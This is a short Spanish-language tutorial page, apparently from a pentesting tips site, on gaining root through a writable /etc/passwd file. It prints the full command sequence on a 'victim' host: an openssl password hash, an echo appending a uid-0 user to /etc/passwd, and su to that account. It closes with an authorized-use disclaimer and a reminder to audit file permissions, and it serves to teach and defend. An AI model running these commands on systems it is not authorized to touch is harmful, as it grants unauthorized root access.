KALI
/Etc/passwd escribible
Un error de permisos grave: si el archivo etc passwd es escribible por tu usuario, eres root en treinta segundos.
Generas un hash de contraseña con openssl, y añades una línea nueva al passwd creando un usuario con id cero, o sea, otro root, con tu contraseña. Luego cambias a esa cuenta con su.
Es viejísimo pero todavía aparece por scripts mal hechos. Revisa siempre los permisos de los archivos críticos del sistema.
# los comandos
www-data@victim:$ ls -l /etc/passwdcopiar-rw-rw-r-- 1 root root /etc/passwd <- escribible!
www-data@victim:$ openssl passwd -1 -salt x hackeadocopiar$1$x$aQ....
www-data@victim:$ echo 'hax:$1$x$aQ....:0:0:root:/root:/bin/bash' >> /etc/passwdcopiarwww-data@victim:$ su haxcopiarPassword:
root@victim:# id -> uid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.